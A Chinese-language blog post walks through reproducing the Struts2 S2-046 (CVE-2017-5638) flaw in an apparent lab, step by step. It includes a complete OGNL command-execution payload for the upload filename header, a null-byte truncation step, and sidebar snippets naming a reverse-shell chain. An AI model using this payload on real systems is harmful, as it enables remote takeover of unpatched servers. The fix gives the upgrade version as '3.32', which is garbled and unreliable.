struts2 S2-046(cve_2017_5638)

已于 2022-03-01 20:30:15 修改
阅读量433 收藏
点赞数
文章标签: struts
于 2022-03-01 19:25:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123211563
版权

漏洞介绍

名称: struts2-046 远程代码执行 (CVE-2017-5638)

描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。

影响范围

Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.1

漏洞复现

1.访问地址

2.burpsuite抓包

3.更改filename后内容

"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} b"

可以看到下图中命令所在的位置,执行的命令为ls /tmp

 4.使用00截断(b在hex中是62,找到62前面的一个改成00即可)

 5.发包,获得flag

漏洞防御

官方表示,如果用户正在使用基于Jakarta的文件上传插件,建议升级至Struts版本3.32或2.5.10.1

Z_l123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
struts2-046 远程代码执行 (CVE-2017-5638
qq_32445755的博客
03-10 960
Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 目前,Struts框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网
vulfocus靶场struts2 命令执行 CVE-2016-3081
没有故事
04-23 430
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
vulfocus 靶场struts2 代码执行 (CVE-2020-17530)
最新发布
没有故事
04-24 759
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。
【vulhub】Structs2 S2-046 远程代码执行漏洞CVE-2017-5638
weixin_42884199的博客
12-07 1016
前提 Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 一、启动靶机 docker-compose build docker-compose up -d 二、
Apache Struts2 S2-045远程命令执行漏洞CVE-2017-5638)复现
qq_40640917的博客
02-23 2279
Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个...
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson-databind 漏洞 CVE-2017-7525、...
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
CVE-2017-3506,又称为S2-048,是由于Struts2中的`Struts REST插件`和`Struts XML动作配置`处理不安全的HTTP标头所导致。当用户提交的HTTP请求包含恶意构造的`Content-Type`头部时,Struts2框架在解析该头部时可能会...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
最后,s2-017(CVE-2017-9791)是2017年的另一个反序列化漏洞,它影响了Struts2StrutsRequestWrapper类。攻击者可以利用这个漏洞,通过发送恶意的HTTP请求,触发系统的反序列化过程,执行任意代码。 为了应对这些...
K8_Struts2_EXP.zip
09-27
]10 S2-045 CVE-2017-5638 支持GetShell/获取物理路径/执行CMD命令 [+]9 devMode CVE-xxxx-xxxx 支持GetShell/获取物理路径/执行CMD命令 [+]8 S2-037 CVE-2016-4438 支持GetShell/获取物理路径/执行CMD命令 [+]7 ...
s2-045远程代码执行漏洞复现(工具打)
weixin_50495345的博客
04-11 416
这篇文章只写漏洞复现过程,需要详解漏洞原理的小伙伴请自行查找喔。使用ubuntu(192.168.8.135)下docker搭建vulhub漏洞环境使用steuts2全系列漏洞检测工具对漏洞进行检测和复现(工具可以自行去github.com下载)
墨者Apache Struts2远程代码执行漏洞(S2-015)题解
zr1213159840的博客
01-08 2608
这题在网上搜索后,发现是这么进行操作的 首先在地址后面添加 ${1+2}.action 即访问 http://219.153.49.228:43186/${1+2}.action 发现存在回显 然后我们构造以下信息,访问当前的文件夹,发现key.txt %24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDecla
struts2漏洞S2-046修复解决方案
qq_38472535的博客
05-13 317
struts2漏洞S2-046修复解决方案
vulfocus——struts2-cve_2017_9791
m0_62063669的博客
09-05 646
它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。攻击者将用户可控地值添加到ActionMessage并在客户前端展示,导致其进入getText函数,最后messageb被当作OGNL表达式执行。6. 再换成命令ls,然后报错了,在里面看到一串字符,想试试看,是不是flag,结果真的对了。7.将payload进行url转换,抓包然后替换,再发送,就得到flag了。5.把id换成pwd,查看当前目录,发现当前目录是tmp。
Apache Struts2S2-046漏洞预警
热门推荐
煜铭2011
03-21 1万+
0x00 前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Contro
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5858
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
漏洞复现-EmpireCms-文件上传】vulfocus/empirecms-cve_2018_18086
10-09 1804
【EmpireCms-文件上传】帝国建站
【vulfocus漏洞复现-初级】solr 代码执行 (CVE-2019-12409)
ll_515的博客
01-20 1811
Apache Solr受影响的版本8.1.1和8.2.0在solr.in.sh配置文件中默认开启了ENABLE_REMOTE_JMX_OPTS配置项,即允许远程加载JMX,导致可远程代码执行。
【vulfocus漏洞复现】Spring boot (CVE-2021_21234)
一剑开天门!的博客
03-02 5301
【vulfocus漏洞复现】Spring boot (CVE-2021_21234)
CVE-2017-5638漏洞利用
10-08
CVE-2017-5638是一个与Apache Struts框架相关的远程代码执行漏洞。该漏洞利用了Apache Struts框架中的一个问题,攻击者可以通过精心构造的恶意输入来执行任意代码,从而实现远程代码执行。 攻击者可以利用该漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值